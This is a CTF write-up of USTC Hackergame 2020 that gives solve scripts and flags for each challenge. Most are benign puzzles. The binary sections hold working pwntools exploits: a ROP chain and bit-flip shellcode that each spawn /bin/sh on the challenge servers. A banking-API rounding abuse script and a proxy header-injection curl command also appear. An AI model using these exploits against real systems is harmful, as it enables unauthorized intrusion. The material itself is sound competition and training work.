中国科学技术大学第七届信息安全大赛 —— USTC Hackergame 2020 WriteUp
前言
抽空玩了两天。没过程,只有解题脚本。
当前分数:3250, 总排名:31 / 2410
binary:600 , general:2000 , math:150 , web:500
0x00 Web - 签到
http://202.38.93.111:10000/?number=1
flag{hR6Ku81-HappyHacking2020-a297053b82}
0x01 General - 猫咪问答++
1. Docker,Golang,Plan 9,PHP,GNU,Perl,FireFox,MySQL,PostgreSQL,MariaDB,Apache Tomcat,Xfce
2. [RFC 1149] MTU 256 milligrams
3. https://ftp.lug.ustc.edu.cn/%E6%B4%BB%E5%8A%A8/2019.09.21_SFD/slides/%E9%97%AA%E7%94%B5%E6%BC%94%E8%AE%B2/Teeworlds/teeworlds.pdf
4. http://vr.shouxi360.com/index.php?m=content&c=index&a=show&catid=26&id=pNiHHxiHjPg
5. https://news.ustclug.org/2019/12/hackergame-2019/
12
256
9
9
17098
flag{b4a31f2a_G00G1e_1s_y0ur_fr13nd_eac1f4394c}
0x02 Web - 2048
首页源码提示 static/js/html_actuator.js
http://202.38.93.111:10005/getflxg?my_favorite_fruit=banana
flxg{8G6so5g-FLXG-2510119fa7}
0x03 General - 一闪而过的 Flag
拖到命令行里运行
flag{Are_you_eyes1ght_g00D?_can_you_dIst1nguish_1iI?}
0x04 General - 从零开始的记账工具人
import xlrd, re
def unit(i):
    """Convert a Chinese financial numeral below one thousand into an int.

    The text is split into an optional hundreds part (ending in 佰), an
    optional tens part (ending in 拾) and a remainder; 零 padding is
    stripped from each part before the digit lookup.  A bare 佰 or 拾
    with no leading digit counts as one hundred / ten.  An empty string
    yields 0; an unknown digit raises ValueError from list.index.
    """
    if not len(i):
        return 0
    digits = ['', '壹', '贰', '叁', '肆', '伍', '陆', '柒', '捌', '玖', '拾']
    hundreds, tens, ones = re.findall(r'(.*佰)?(.*拾)?(.*)', i)[0]
    total = digits.index(hundreds[:-1].strip('零')) * 100
    total += digits.index(tens[:-1].strip('零')) * 10
    total += digits.index(ones.strip('零'))
    # A unit character on its own ("拾" meaning 10) has no digit in front of it.
    if len(hundreds) == 1:
        total += 100
    if len(tens) == 1:
        total += 10
    return total
def parse(i):
    """Convert a Chinese currency amount into an integer number of 分.

    The text is split into an optional 元 part, an optional 角 part and a
    remainder.  The last character of every part (the unit, or a trailing
    word such as 整) is dropped before the part is handed to unit().
    """
    parts = re.findall(r'(.*元)?(.*角)?(.*)', i)[0]
    weights = (100, 10, 1)
    return sum(unit(part[:-1]) * weight for part, weight in zip(parts, weights))
# Sum price * quantity over every data row of the first sheet (row 0 is skipped
# as the header) and print the total in 元 with two decimals.
with xlrd.open_workbook('bills.xlsx') as wb:
    sheet = wb.sheets()[0]
    total_fen = 0
    for row in range(1, sheet.nrows):
        price_fen = parse(sheet.cell_value(row, 0))
        quantity = int(sheet.cell_value(row, 1))
        total_fen += price_fen * quantity
    print('%.2f' % (total_fen / 100))
flag{18051.70}
0x05 General - 超简单的世界模拟器
package main
import (
"bytes"
"fmt"
"math/rand"
"time"
)
// Reference: https://golang.org/doc/play/life.go
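// Field is a fixed-size rectangular grid of cells; true means the cell is alive.
type Field struct {
	s    [][]bool
	w, h int
}

// NewField returns a field of the given width and height with every cell dead.
func NewField(w, h int) *Field {
	s := make([][]bool, h)
	for i := range s {
		s[i] = make([]bool, w)
	}
	return &Field{s: s, w: w, h: h}
}

// Set assigns state b to the cell at (x, y). The coordinates are not
// bounds-checked, so an out-of-range index panics.
func (f *Field) Set(x, y int, b bool) {
	f.s[y][x] = b
}

// Alive reports whether the cell at (x, y) is alive. Unlike the reference
// life.go, the field does not wrap around: any coordinate outside the grid
// is treated as dead.
func (f *Field) Alive(x, y int) bool {
	// y is checked against the height; the original compared it with the
	// width, which is only correct for square fields.
	if x < 0 || x >= f.w || y < 0 || y >= f.h {
		return false
	}
	// In-range coordinates need no modulo wrap, so the cell is read directly.
	return f.s[y][x]
}

// Next returns the state of the cell at (x, y) in the following generation:
// alive with exactly three live neighbours, or with two when already alive.
func (f *Field) Next(x, y int) bool {
	alive := 0
	for i := -1; i <= 1; i++ {
		for j := -1; j <= 1; j++ {
			// Skip the cell itself; only the eight neighbours count.
			if (j != 0 || i != 0) && f.Alive(x+i, y+j) {
				alive++
			}
		}
	}
	return alive == 3 || (alive == 2 && f.Alive(x, y))
}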
// Life holds two fields of equal size: a is the current generation and b is
// the scratch field that Step fills with the next one.
type Life struct {
	a, b *Field
	w, h int
}

// NewLife returns a game of the given size with every cell dead.
func NewLife(w, h int) *Life {
	return &Life{
		a: NewField(w, h),
		b: NewField(w, h),
		w: w,
		h: h,
	}
}

// Step advances the game by one generation.
func (l *Life) Step() {
	cur, next := l.a, l.b
	for y := 0; y < l.h; y++ {
		for x := 0; x < l.w; x++ {
			next.Set(x, y, cur.Next(x, y))
		}
	}
	// The freshly computed field becomes current; the old one is reused as scratch.
	l.a, l.b = next, cur
}

// String renders the current generation as h lines of w characters,
// '1' for a live cell and '0' for a dead one.
func (l *Life) String() string {
	var out bytes.Buffer
	for y := 0; y < l.h; y++ {
		for x := 0; x < l.w; x++ {
			if l.a.Alive(x, y) {
				out.WriteByte('1')
			} else {
				out.WriteByte('0')
			}
		}
		out.WriteByte('\n')
	}
	return out.String()
}
// show re-seeds the generator with t and prints the 15x15 starting pattern
// that seed produces. It draws the same number of random cells, in the same
// order, as main does after seeding, so the pattern matches the one simulated.
func show(t int64) {
	const cells = 15 * 15 / 4
	rand.Seed(t)
	board := NewLife(15, 15)
	for n := 0; n < cells; n++ {
		// x is drawn before y; the draw order must not change.
		x := rand.Intn(15)
		y := rand.Intn(15)
		board.a.Set(x, y, true)
	}
	fmt.Println(board)
}
// main tries time-based seeds until it has printed two starting patterns:
// first one that destroys at least one of the two 2x2 blocks within 200
// generations, then one that destroys both.
//
// math/rand is the right tool here: the seed has to be replayable by show and
// nothing secret depends on it. NOTE(review): rand.Seed is deprecated since
// Go 1.20.
func main() {
	// Each target is a 2x2 block at x = 45..46, identified by its top row.
	blockTops := []int{5, 25}
	const randomCells = 15 * 15 / 4
	foundOne := false
	for {
		seed := time.Now().UnixNano()
		rand.Seed(seed)
		world := NewLife(50, 50)
		for _, top := range blockTops {
			for _, y := range []int{top, top + 1} {
				world.a.Set(45, y, true)
				world.a.Set(46, y, true)
			}
		}
		// Random live cells are confined to the 15x15 corner at the origin.
		for n := 0; n < randomCells; n++ {
			x := rand.Intn(15)
			y := rand.Intn(15)
			world.a.Set(x, y, true)
		}
		for gen := 0; gen < 200; gen++ {
			world.Step()
		}
		// A block counts as destroyed only when all four of its cells are dead.
		destroyed := 0
		for _, top := range blockTops {
			anyAlive := world.a.Alive(45, top) || world.a.Alive(46, top) ||
				world.a.Alive(45, top+1) || world.a.Alive(46, top+1)
			if !anyAlive {
				destroyed++
			}
		}
		switch {
		case !foundOne && destroyed > 0:
			show(seed)
			foundOne = true
		case foundOne && destroyed > 1:
			show(seed)
			return
		}
	}
}
蝴蝶效应
100000000010000
010000100100000
010000000000000
110010000000000
100000000000000
101010000000101
001000010001001
001000010100000
110010001110100
000000011000000
001100000000001
110000010111100
000000000000100
000010010000100
010011000000100
flag{D0_Y0U_l1k3_g4me_0f_l1fe?_d63de68291}
一石二鸟
001001000100000
001000000100000
100000110000100
001000000000000
100000100011000
101010100100001
000000100000100
110000100101101
000110000000010
110000010000110
100000000000010
000000000111100
000000001000100
000100001000100
010000010001011
flag{1s_th3_e55ence_0f_0ur_un1ver5e_ju5t_c0mputat1on?_4e2bf90f25}
0x06 General - 自复读的复读机
反向复读
# The base64 payload decodes to a Python script that opens /proc/self/maps and
# /proc/self/mem, searches the readable mappings for this very
# `exec(__import__("base64")` line and writes it to stdout reversed.
# These comment lines are annotation only; the submission is the single line below.
# Decode and read a blob like this before running it: exec() on base64 hides
# what actually executes.
exec(__import__("base64").b64decode("aW1wb3J0IHN5cywgb3MsIHJlCgpzeW1ib2wgPSBiJ2V4ZWMoX19pbXBvcnRfXygiYmFzZTY0IiknCgptYXBzX2ZpbGUgPSBvcGVuKCIvcHJvYy9zZWxmL21hcHMiLCAncicpCm1lbV9maWxlID0gb3BlbigiL3Byb2Mvc2VsZi9tZW0iLCAncmInKQpmb3IgbGluZSBpbiBtYXBzX2ZpbGUucmVhZGxpbmVzKCk6CiAgICBtID0gcmUubWF0Y2gocicoWzAtOUEtRmEtZl0rKS0oWzAtOUEtRmEtZl0rKSAoWy1yXSknLCBsaW5lKQogICAgaWYgbS5ncm91cCgzKSA9PSAncic6CiAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgIG1lbV9maWxlLnNlZWsoc3RhcnQpCiAgICAgICAgY2h1bmsgPSBtZW1fZmlsZS5yZWFkKGVuZCAtIHN0YXJ0KQogICAgICAgIGlmIHN5bWJvbCBpbiBjaHVuazoKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgICAgIGlmIGxlbihjaHVuaykgPCAxOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBpbmRleCA9IGNodW5rLmZpbmQoc3ltYm9sKQogICAgICAgICAgICAgICAgaWYgaW5kZXggPCAwOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBjaHVuayA9IGNodW5rW2luZGV4Ol0KICAgICAgICAgICAgICAgIGNvbnRlbnQgPSBjaHVuay5zcGxpdChiJ1x4MDAnKVswXQogICAgICAgICAgICAgICAgaWYgbGVuKGNvbnRlbnQpID4gbGVuKHN5bWJvbCk6CiAgICAgICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY29udGVudFs6Oi0xXSkKICAgICAgICAgICAgICAgICAgICBleGl0KCkKICAgICAgICAgICAgICAgIGNodW5rID0gY2h1bmtbbGVuKHN5bWJvbCk6XQo="))
flag{Yes!_Y0U_h4v3_a_r3v3rs3d_Qu1ne_75e6983fa9}
哈希复读
# The base64 payload decodes to a Python script that opens /proc/self/maps and
# /proc/self/mem, searches the readable mappings for this very
# `exec(__import__("base64")` line and writes the hex SHA-256 digest of that
# line to stdout.
# These comment lines are annotation only; the submission is the single line below.
# Decode and read a blob like this before running it: exec() on base64 hides
# what actually executes.
exec(__import__("base64").b64decode("aW1wb3J0IHN5cywgb3MsIHJlLCBoYXNobGliCgpzeW1ib2wgPSBiJ2V4ZWMoX19pbXBvcnRfXygiYmFzZTY0IiknCgptYXBzX2ZpbGUgPSBvcGVuKCIvcHJvYy9zZWxmL21hcHMiLCAncicpCm1lbV9maWxlID0gb3BlbigiL3Byb2Mvc2VsZi9tZW0iLCAncmInKQpmb3IgbGluZSBpbiBtYXBzX2ZpbGUucmVhZGxpbmVzKCk6CiAgICBtID0gcmUubWF0Y2gocicoWzAtOUEtRmEtZl0rKS0oWzAtOUEtRmEtZl0rKSAoWy1yXSknLCBsaW5lKQogICAgaWYgbS5ncm91cCgzKSA9PSAncic6CiAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgIG1lbV9maWxlLnNlZWsoc3RhcnQpCiAgICAgICAgY2h1bmsgPSBtZW1fZmlsZS5yZWFkKGVuZCAtIHN0YXJ0KQogICAgICAgIGlmIHN5bWJvbCBpbiBjaHVuazoKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgICAgIGlmIGxlbihjaHVuaykgPCAxOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBpbmRleCA9IGNodW5rLmZpbmQoc3ltYm9sKQogICAgICAgICAgICAgICAgaWYgaW5kZXggPCAwOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBjaHVuayA9IGNodW5rW2luZGV4Ol0KICAgICAgICAgICAgICAgIGNvbnRlbnQgPSBjaHVuay5zcGxpdChiJ1x4MDAnKVswXQogICAgICAgICAgICAgICAgaWYgbGVuKGNvbnRlbnQpID4gbGVuKHN5bWJvbCk6CiAgICAgICAgICAgICAgICAgICAgc3lzLnN0ZG91dC53cml0ZShoYXNobGliLnNoYTI1Nihjb250ZW50KS5oZXhkaWdlc3QoKSkKICAgICAgICAgICAgICAgICAgICBleGl0KCkKICAgICAgICAgICAgICAgIGNodW5rID0gY2h1bmtbbGVuKHN5bWJvbCk6XQo="))
flag{W0W_Y0Ur_c0de_0utputs_1ts_0wn_sha256_40e965f438}
0x07 General - 233 同学的字符串工具
字符串大写工具
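# Search the Basic Multilingual Plane for single characters whose upper-case
# form is the two ASCII letters "FL".
#
# Defensive takeaway: str.upper() can expand one code point into several ASCII
# letters, so a filter on the input has to run after the case mapping, not
# before it.
for a in range(256):
    for b in range(256):
        # range(256) also covers the 0xFF high and low bytes that range(255)
        # skipped; chr() builds the code point directly, so no generated
        # "\uXXXX" literal has to go through exec().
        c = chr((a << 8) | b)
        if c.upper() == 'FL':
            print(c)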
flag
flag{badunic0debadbad_010dc0f407}
编码转换工具
http://string-functions.com/encodingtable.aspx?encoding=65000&decoding=20127
观察规律,对字母进行编码
+AGY-lag
flag{please_visit_www.utf8everywhere.org_6b46279238}
0x08 General - 233 同学的 Docker
flag{Docker_Layers!=PS_Layers_hhh}
0x09 General - 从零开始的 HTTP 链接
mikrotik nat
flag{TCP_P0RT_0_1s_re5erved_BUT_w0rks_5e4ca20ca5}
0x0A General - 超简陋的 OpenGL 小程序
basic_lighting.vs文件里面,main函数第2行插入
// Collapse every position whose z exceeds 0.2 to the origin. Presumably this
// removes the geometry in front of the hidden text; the rest of the shader
// is not shown on this page.
if (FragPos.z > 0.2) FragPos = vec3(0.0, 0.0, 0.0);
flag{glGraphicsHappy(233);}
0x0B Binary - 生活在博弈树上
始终热爱大地
依次输入以下内容
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
a1a1
a0a2
a1a0
a2a2
flag{easy_gamE_but_can_u_get_my_shell}
升上天空
from pwn import *
from struct import pack
# Chain layout produced by `ROPgadget --binary tictactoe --ropchain`; every
# address below is specific to that binary.
# NOTE(review): fixed gadget addresses only work when the target is loaded at
# a fixed base and the overwritten return address is not guarded (presumably a
# non-PIE build without a stack canary on this path). PIE plus a stack
# protector is the corresponding hardening.
chain = [
    pack('<Q', 0x0000000000407228),  # pop rsi ; ret
    pack('<Q', 0x00000000004a60e0),  # @ .data
    pack('<Q', 0x000000000043e52c),  # pop rax ; ret
    '/bin//sh',
    pack('<Q', 0x000000000046d7b1),  # mov qword ptr [rsi], rax ; ret
    pack('<Q', 0x0000000000407228),  # pop rsi ; ret
    pack('<Q', 0x00000000004a60e8),  # @ .data + 8
    pack('<Q', 0x0000000000439070),  # xor rax, rax ; ret
    pack('<Q', 0x000000000046d7b1),  # mov qword ptr [rsi], rax ; ret
    pack('<Q', 0x00000000004017b6),  # pop rdi ; ret
    pack('<Q', 0x00000000004a60e0),  # @ .data
    pack('<Q', 0x0000000000407228),  # pop rsi ; ret
    pack('<Q', 0x00000000004a60e8),  # @ .data + 8
    pack('<Q', 0x000000000043dbb5),  # pop rdx ; ret
    pack('<Q', 0x00000000004a60e8),  # @ .data + 8
    pack('<Q', 0x0000000000439070),  # xor rax, rax ; ret
]
# The generated chain repeats this gadget 59 times, leaving rax = 59
# (the execve syscall number on x86-64 Linux) before the syscall gadget.
chain += [pack('<Q', 0x0000000000463af0)] * 59  # add rax, 1 ; ret
chain.append(pack('<Q', 0x0000000000402bf4))  # syscall
p = ''.join(chain)

# NOTE(review): this is a personal challenge token published in plain text;
# redact it or read it from the environment before sharing the script.
token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
io = remote('202.38.93.111', 10141)
io.sendline(token)
# 0x90 + 0x8 filler bytes precede the chain in the first input.
padding = 'a' * (0x90 + 0x8)
io.sendlineafter('(0,1):', padding + p)
# Same four inputs as in the first part of this challenge.
for move in ('a1a1', 'a0a2', 'a1a0', 'a2a2'):
    io.sendline(move)
io.interactive()
flag{Get_the_she11_1s_not_so_hard_2571392e56}
0x0C General - 狗狗银行
四舍五入
import requests, json
# NOTE(review): indentation was lost in the published listing; the nesting
# below is inferred from the use of the loop variables.
url = 'http://202.38.93.111:10100'
# NOTE(review): the bearer token is a personal credential published in plain
# text; redact it or read it from the environment before sharing the script.
headers = {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer 1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
}
timeout = 5
count = 50
assert count >= 30


def _post(path, payload):
    """POST payload as a JSON body to url + path with the shared headers and timeout."""
    return requests.post(url + path, data=json.dumps(payload), headers=headers, timeout=timeout)


# Start from a clean state, open one credit account (account 2) and move the
# borrowed amount into account 1.
_post('/api/reset', {})
_post('/api/create', {"type": "credit"})
_post('/api/transfer', {"src": 2, "dst": 1, "amount": 167 * count - 1000})

# Open count - 1 debit accounts (ids 3 and up) holding 167 each.
# Presumably 167 is the smallest balance whose daily interest rounds up to 1
# (the section heading says "四舍五入"). The defensive counterpart is to
# compute interest on exact amounts or per customer, not per rounded account.
for i in range(count - 1):
    _post('/api/create', {"type": "debit"})
    _post('/api/transfer', {"src": 1, "dst": i + 3, "amount": 167})

# Each round: advance one day, sweep 1 from every account into account 2 and
# stop as soon as the user record carries a flag.
while True:
    _post('/api/eat', {"account": 2})
    for i in range(count + 1):
        _post('/api/transfer', {"src": i + 1, "dst": 2, "amount": 1})
    user = requests.get(url + '/api/user', headers={'Authorization': headers['Authorization']}, timeout=timeout)
    flag = json.loads(user.text)['flag']
    if flag:
        print(flag)
        break
flag{W0W.So.R1ch.Much.Smart.52f2d579}
0x0D General - 超基础的数理模拟器
from sympy import *
from sympy.parsing.latex import parse_latex
import requests
# NOTE(review): personal challenge token published in plain text; redact it
# or read it from the environment before sharing the script.
token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
url = 'http://202.38.93.111:10190'
# One shared session, logged in once below and reused by solve().
s = requests.session()
# Decimal value that solve() substitutes for the letter "e" in the LaTeX text.
e = 2.71828182845904523536
s.get(url + '/login', params={'token': token}, timeout=2)
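def solve():
    """Fetch one problem, evaluate it numerically and submit the answer.

    The LaTeX between '<p> $' and '$</p>' is simplified by plain string
    replacement, parsed with parse_latex and converted to float.  Returns
    True when an answer was submitted, False when the parsed expression
    could not be turned into a float (the caller simply retries).
    """
    r = s.get(url, timeout=2)
    expr = r.content.split('<p> $')[1].split('$</p>')[0]
    # NOTE(review): replace('e', ...) rewrites every letter "e", not only the
    # constant; expressions containing other "e"s presumably end up in the
    # failure path below.
    for old, new in (('\\left', ''), ('\\right', ''), ('\\,', ''), ('e', str(e)), ('{d x}', '')):
        expr = expr.replace(old, new)
    integ = parse_latex(expr)
    try:
        result = float(integ)
    except Exception:
        # Narrowed from a bare except so that Ctrl-C (KeyboardInterrupt) and
        # SystemExit still stop the retry loop.
        return False
    s.post(url + '/submit', data={'ans': '%.6f' % result}, timeout=2)
    return True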
# Keep solving until 400 answers have been submitted, printing the running
# count before every attempt, then dump the final page (which carries the flag).
count = 0
while count < 400:
    print(count)
    if solve():
        count += 1
print(s.get(url, timeout=2).content)
flag{S0lid_M4th_Phy_Foundation_4c656e3f18}
0x0E Web - 超安全的代理服务器
找到 Secret
设置系统环境变量 SSLKEYLOGFILE,用 Wireshark 抓包并借助该密钥日志文件解密 TLS 流量;重新打开浏览器访问网站,即可看到解密后的 HTTP/2 流量,其中有 PUSH_PROMISE 帧(Server Push)。访问服务器推送过来的链接,拿到 flag 和 secret。
flag{d0_n0t_push_me}
入侵管理中心
# The inner curl fetches the pushed page and extracts a 10-character hex
# secret, which the outer curl sends to the HTTPS proxy as the Secret header.
# -k and --proxy-insecure switch off certificate verification for the origin
# and for the proxy; that is acceptable only against a challenge host.
# -p tunnels the request through the proxy to http://0.0.0.0:8080/.
# NOTE(review): the backslashes before the backticks and the doubled
# backslashes in the grep pattern look like escaping left over from the page
# markup; check them before reuse.
curl -v -k --proxy-insecure -x 'https://146.56.228.227' --proxy-header 'Secret: '\`curl -k https://146.56.228.227/00ea158a-0bda-45f5-b957-e1e89c489979 | grep -o "[a-f0-9]\\{10\\}"\` -H 'Referer: http://146.56.228.227:8080/' -p http://0.0.0.0:8080/
flag{c0me_1n_t4_my_h0use}
0x0F Binary - 超精准的宇宙射线模拟器
from pwn import *
def flip(addr, bit):
    """Wait for the 'flip?' prompt and request one bit flip.

    The request is sent as '<hex address> <bit index>'.
    """
    request = '%x %d' % (addr, bit)
    io.sendlineafter('flip?', request)
def write(addr, old, new):
    """Turn the bytes at addr from old into new using single-bit flips.

    old is taken to be the current content at addr.  Only the bits that
    differ between old and new are flipped, byte by byte, lowest bit first.
    """
    assert len(old) >= len(new)
    # zip() stops after len(new) bytes because old is at least as long.
    for offset, (before, after) in enumerate(zip(old, new)):
        diff = ord(before) ^ ord(after)
        for bit in range(8):
            if (diff >> bit) & 1:
                flip(addr + offset, bit)
# Connect to the challenge service and authenticate.
# NOTE(review): the token is a personal credential published in plain text;
# redact it or read it from the environment before sharing the script.
io = remote('202.38.93.111', 10231)
token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
io.sendline(token)
# One bit at 0x401296 is flipped before the patch and another one after it.
# Which instruction this alters is not shown on this page; presumably the
# first flip keeps the program asking for more flips and the second redirects
# execution to the patched bytes (TODO confirm against the binary).
flip(0x401296, 4)
# old: the 32 bytes assumed to be present at 0x401110.
# new: 23 bytes of x86-64 machine code that contain the ASCII text "/bin//sh".
old = '\xB8P@@\x00H=P@@\x00t\x13\xB8\x00\x00\x00\x00H\x85\xC0t\x09\xBFP@@\x00\xFF\xE0f\x90'
new = '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
# NOTE(review): patching code in place only works when the code pages are
# writable; a strict W^X mapping is the corresponding hardening.
write(0x401110, old, new)
flip(0x401296, 6)
io.interactive()
flag{B1t_fl1pfl1pfl1pfl1pfl1p_g0tshe11_owo_03d4de46a4}
0x10 Math - 不经意传输
解密消息
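令 v = x0,则 (v − x0)^d mod N = 0,服务端返回的 m0_ 中不再含有掩码,因此 m0 = m0_(这里假设题目采用常见的基于 RSA 的 1-2 不经意传输构造:m0_ = m0 + (v − x0)^d mod N)。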
flag{U_R_0n_Th3_ha1f_way_0f_succe55_w0rk_h4rder!_b3fbc0785f}